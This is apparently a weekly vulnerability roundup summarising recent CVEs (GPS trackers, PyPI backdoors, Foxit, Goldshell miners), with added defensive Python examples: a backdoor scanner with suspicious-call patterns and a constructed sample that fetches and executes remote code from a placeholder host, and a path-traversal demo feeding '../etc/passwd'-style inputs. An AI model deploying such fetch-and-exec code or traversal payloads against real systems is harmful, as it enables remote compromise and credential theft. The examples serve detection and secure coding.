This week saw the publication of 579 new CVE IDs. Of those, 356 had not yet been assigned official CVSS scores; of the ones that had, approximately 6% were of critical severity, 37% high, 52% medium and 5% low. Listed below are the vulnerabilities that caught our attention:
The modern threat landscape is an ever-changing vista of vulnerabilities, tools, tactics and procedures that pose an existential threat to the security of organizations’ IT infrastructures. A key part of an evergreen security program is to maintain an up-to-date knowledge base of actionable threat intelligence that an organization can leverage to improve its security posture. With dozens of novel threats and vulnerabilities becoming public each week, it can be challenging for IT professionals to keep pace. Control Gap intends to separate the signal from the noise by highlighting in this weekly segment newly disclosed vulnerabilities that have been assigned a CVE ID and which may be especially novel, widespread, critical or otherwise noteworthy.
The available threat intelligence at time of writing is documented below. Updates will be clearly marked.
Real-World Exploitability: High
Exploited in the Wild: Likely
Available Public Exploits: Yes
Cyber security firm BitSight published multiple vulnerabilities in the MiCODUS MV720 GPS tracker, including remote code execution, cross-site scripting and insecure direct object references that disclose sensitive information. Sensitive functions reachable through the device include cutting off fuel to the vehicle and controlling its alarm. BitSight reports that these trackers are in use in vehicles owned by Fortune 50 firms, critical infrastructure companies and various world governments. CISA released an advisory recommending that end users ensure the devices are not reachable remotely, as public exploits have been released. While BitSight discovered six vulnerabilities, only five have been assigned CVE IDs. The CVE IDs which have been assigned are as follows:
Microsoft’s Patch Tuesday on July 12th, 2022, saw disclosure of 84 security vulnerabilities for Microsoft products. Highlights from these disclosures include the following:
Real-World Exploitability: High
Exploited in the Wild: Unknown
Available Public Exploits: No
For the second month in a row, multiple Python Package Index (PyPI) projects have been found to contain backdoors that allow remote code execution in the context of the application using the package. The backdoors were inserted into the projects by an unknown third party. Exposure depends heavily on how the package is used and on whether an attacker can reach the affected system. This highlights the importance of software supply chain governance and the need for professional review before an organization incorporates a third-party open-source component into its own projects. The affected packages, associated versions and corresponding CVE IDs can be found below:
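As an added example (not Control Gap's code, and not code from any of the affected projects), the script below is the kind of lightweight triage a reviewer can run over a candidate package before adopting it. It parses the package source with the standard library's ast module without executing it, flags calls characteristic of the backdoors described (dynamic code execution, payload decoding, process spawning, network access) and long base64-looking string literals, and separates indicators that fire merely on import from those inside functions. The indicator list and the sample package source at the bottom are constructed for illustration and do not reproduce any real PyPI package.

```python
"""Static triage of third-party Python package source for backdoor indicators.

Added example for this roundup: not Control Gap's code and not code from any
affected PyPI project. Standard library only. The sample source scanned at the
bottom is constructed for illustration.
"""
import ast
import re
from dataclasses import dataclass
from typing import List, Optional

# Calls worth a human look in library code: dynamic code execution, payload
# decoding, process spawning and network access. Names are matched in the
# dotted form written in the source, so `from os import system; system(...)`
# would be missed; resolving imports is left out to keep the example short.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "__import__",
    "base64.b64decode", "base64.b85decode", "marshal.loads", "zlib.decompress",
    "codecs.decode",
    "os.system", "os.popen", "subprocess.Popen", "subprocess.run",
    "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "requests.post", "socket.socket",
}

# Long unbroken base64-looking string constants often carry a staged payload.
_B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{64,}={0,2}$")


@dataclass
class Finding:
    lineno: int
    indicator: str
    import_time: bool  # True if reached merely by importing the module


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'a.b.c' for a Name/Attribute chain, else None (e.g. a call result)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def scan_source(source: str, filename: str = "<module>") -> List[Finding]:
    """Parse (never execute) `source` and list suspicious calls and literals."""
    findings: List[Finding] = []

    def visit(node: ast.AST, in_function: bool) -> None:
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            in_function = True  # body runs only when something calls it
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append(Finding(node.lineno, name, not in_function))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if _B64_LITERAL.match(node.value):
                findings.append(Finding(node.lineno, "base64-like literal", not in_function))
        for child in ast.iter_child_nodes(node):
            visit(child, in_function)

    visit(ast.parse(source, filename), False)
    return findings


def import_time_findings(findings: List[Finding]) -> List[Finding]:
    """The subset that fires on `import pkg` alone: highest priority for review."""
    return [f for f in findings if f.import_time]


# Constructed sample with the shape of an import-time backdoor. The URL uses
# the reserved .invalid TLD and is never contacted: scan_source only parses.
SAMPLE_PACKAGE_INIT = '''\
import base64
import urllib.request

__version__ = "1.0.0"

def helper(value):
    return value * 2

_payload = urllib.request.urlopen("http://example.invalid/stage").read()
exec(base64.b64decode(_payload))
'''

if __name__ == "__main__":
    for f in scan_source(SAMPLE_PACKAGE_INIT, "pkg/__init__.py"):
        when = "on import" if f.import_time else "when called"
        print(f"pkg/__init__.py:{f.lineno}: {f.indicator} ({when})")
```

Run against an unpacked sdist or wheel, the import-time findings are the ones to read first: a package that fetches and executes remote content when imported, as the constructed sample does, compromises every application that merely lists it as a dependency. The scanner is a triage aid, not a verdict; obfuscated names or aliased imports will evade it, which is exactly why the review still needs a human.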
Real-World Exploitability: High
Exploited in the Wild: Unknown
Available Public Exploits: No
A total of 18 vulnerabilities were published for Foxit PDF Reader version 11.2.1.53537. Multiple components of the program are affected, allowing information disclosure and remote code execution if an attacker can convince a user to open a crafted PDF file. Foxit has released a security bulletin addressing these vulnerabilities and encourages users to update to the latest version; no public exploits had been released at the time of writing. Foxit claims that Foxit PDF Reader is used by more than 425 million users globally, making these vulnerabilities extremely widespread and an attractive vector for PDF document-based attacks. The 18 CVE IDs and summary descriptions can be found here.
Real-World Exploitability: High
Exploited in the Wild: Unknown
Available Public Exploits: Yes
Multiple vulnerabilities have been discovered in Goldshell ASIC miners, including an exposed debug interface, path traversal and default credentials for the installed SSH service. Security researcher James Chambers detailed these vulnerabilities and proof-of-concept exploits in a blog post examining multiple cryptocurrency mining devices. They allow disclosure of arbitrary files, including passwords and other confidential information in plaintext, and give arbitrary users remote access to the device. They should be particularly concerning given the financial risk inherent in the compromise of these devices. The CVE IDs tracking these vulnerabilities are CVE-2022-24660, CVE-2022-24659 and CVE-2022-24657.
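The path traversal in the Goldshell web interface is an instance of a general bug: a user-supplied path is joined onto a document root without checking where the result resolves. As an added example (not the device firmware's handler and not code from the referenced blog post), the following shows the unchecked join beside a checked version, using pure path arithmetic so it runs without touching a filesystem. The document root and the request paths are constructed for illustration.

```python
"""Resolving a user-supplied file path under a fixed web root.

Added example for this roundup: not Control Gap's code and not the Goldshell
firmware's handler. WEB_ROOT and REQUESTS are constructed for illustration.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/static"  # hypothetical document root


def unsafe_path(root: str, requested: str) -> str:
    """The bug: decode, join, trust. '..' segments walk out of root and an
    absolute request path replaces root entirely (posixpath.join semantics)."""
    return posixpath.normpath(posixpath.join(root, unquote(requested)))


def safe_path(root: str, requested: str) -> Optional[str]:
    """Return the resolved path if it stays inside `root`, otherwise None."""
    root = posixpath.normpath(root)
    # Decode percent-encoding exactly once. Decoding again later in the
    # pipeline would turn %252e%252e back into '..' and reopen the hole.
    decoded = unquote(requested)
    if "\x00" in decoded:  # a NUL byte truncates the path in C-based servers
        return None
    # Force the request to be relative so it cannot replace the root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    # Containment check on the normalized result, not on the raw input:
    # 'css/../../x' contains no leading '..' yet still escapes.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


REQUESTS = [  # constructed request paths, benign and hostile
    "css/app.css",
    "../../../etc/passwd",
    "%2e%2e/%2e%2e/%2e%2e/etc/shadow",
    "/etc/passwd",
    "css/../../config.json",
]

if __name__ == "__main__":
    for r in REQUESTS:
        print(f"{r!r:36} unsafe={unsafe_path(WEB_ROOT, r)!r:30} "
              f"safe={safe_path(WEB_ROOT, r)!r}")
```

Two caveats a practitioner would add: pure path arithmetic cannot see symlinks, so a server that actually opens files should apply the same containment test to os.path.realpath of the candidate on the real filesystem; and the check protects only the code path that calls it, so a separate debug interface that reads files on its own, as the advisory describes, needs the same treatment or, better, no network exposure at all.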